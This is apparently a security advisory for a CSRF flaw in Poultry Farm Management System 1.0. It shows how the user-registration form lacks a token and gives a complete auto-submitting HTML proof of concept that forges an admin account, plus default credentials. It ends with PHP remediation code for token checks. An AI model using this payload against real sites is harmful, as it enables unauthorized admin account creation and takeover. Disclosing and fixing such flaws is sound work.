CSRF on Poultry Farm Management System 1.0

Poultry Farm Management System 1.0 suffers from a CSRF attack via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an attacker to create a user with admin rights by sending a crafted payload to an authenticated user.

Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip

Tested on: Ubuntu 20.04.5 LTS + PHP 7.4.3, Apache 2.4.41


Identification

Let’s open the code and see the root cause.

newuser_form.php is responsible for creating users.

newuser_form.php has no CSRF protection.

Since there is no CSRF protection, a new user can be created whenever an authenticated user clicks on a payload hosted on an attacker-controlled site.


Exploitation

Let's create an HTML form that mirrors the newuser_form form and populate it with the new user's values.

GitHub link: https://gist.github.com/gowthamaraj/afc485841bcf227cdc5c71fc16800ebb

PoC HTML:

<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
    <table>
        <tr>
            <td>dignity</td>
            <td><input type="text" value="Admin" name="dignity"></td>
        </tr>
        <tr>
            <td>staffid</td>
            <td><input type="text" value="1" name="staffid"></td>
        </tr>
        <tr>
            <td>fullname</td>
            <td><input type="text" value="foxy" name="fullname"></td>
        </tr>
        <tr>
            <td>firstname</td>
            <td><input type="text" value="purple" name="firstname"></td>
        </tr>
        <tr>
            <td>lastname</td>
            <td><input type="text" value="foxy" name="lastname"></td>
        </tr>
        <tr>
            <td>mobileno</td>
            <td><input type="text" value="9000980008" name="mobileno"></td>
        </tr>
        <tr>
            <td>emailid</td>
            <td><input type="text" value="foxy@gmail.com" name="emailid"></td>
        </tr>
        <tr>
            <td>password</td>
            <td><input type="text" value="password" name="password"></td>
        </tr>
        <tr>
            <td>confirmpassword</td>
            <td><input type="text" value="password" name="confirmpassword"></td>
        </tr>
        <tr>
            <td>signup</td>
            <td><input type="text" value="Register" name="signup"></td>
        </tr>
    </table><input type="submit" value="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
</form>
<script>
    document.forms[0].submit();
</script>
</html>

Change the URLs in the PoC to your target website URL.

I hosted the HTML page at http://20.163.26.136/Redcock-Farm/poc.html for testing. However, you can save the file locally and visit it to test.

Let’s log in to the website using the default credentials provided to us.

Username : ndbhalerao91@gmail.com 
Password : admin

Once logged in, visit the poc.html you hosted.

The user is successfully created.

We can now log in to the website as admin using the user we just created.

Username: foxy@gmail.com 
Password: password

Remediation

  1. Use of CSRF tokens
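The following is an added illustration of the token remediation, not code from the Poultry Farm Management System. It assumes the layout the advisory describes: newuser_form.php renders the registration form, and userregister.php processes the POST (the function names csrf_token, csrf_field and csrf_valid are mine).

```php
<?php
// Added example of synchronizer-token CSRF protection for the user-registration
// flow described in the advisory. Not part of the original project's code.
// Assumed layout: newuser_form.php renders the form, userregister.php handles it.

// Defense in depth: a SameSite session cookie stops most cross-site POSTs
// from carrying the session at all (PHP >= 7.3, matching the tested 7.4.3).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Create a per-session token on first use. random_bytes() is CSPRNG-backed.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for newuser_form.php: echo csrf_field() inside the <form>.
// htmlspecialchars() keeps the value safe inside the attribute.
function csrf_field(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

// hash_equals() is a constant-time compare, so a wrong guess does not leak
// how many leading bytes matched. A missing session token is a failure too.
function csrf_valid($submitted): bool
{
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// userregister.php: validate before any row is written. The attacker's page
// cannot read the victim's token, so the forged POST in the PoC is rejected.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['signup'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token.');
    }
    // Token accepted: the existing user-creation logic continues from here.
}
```

The check must run before the INSERT, and the token must be compared server-side against the session, never against a value that also arrives in the request.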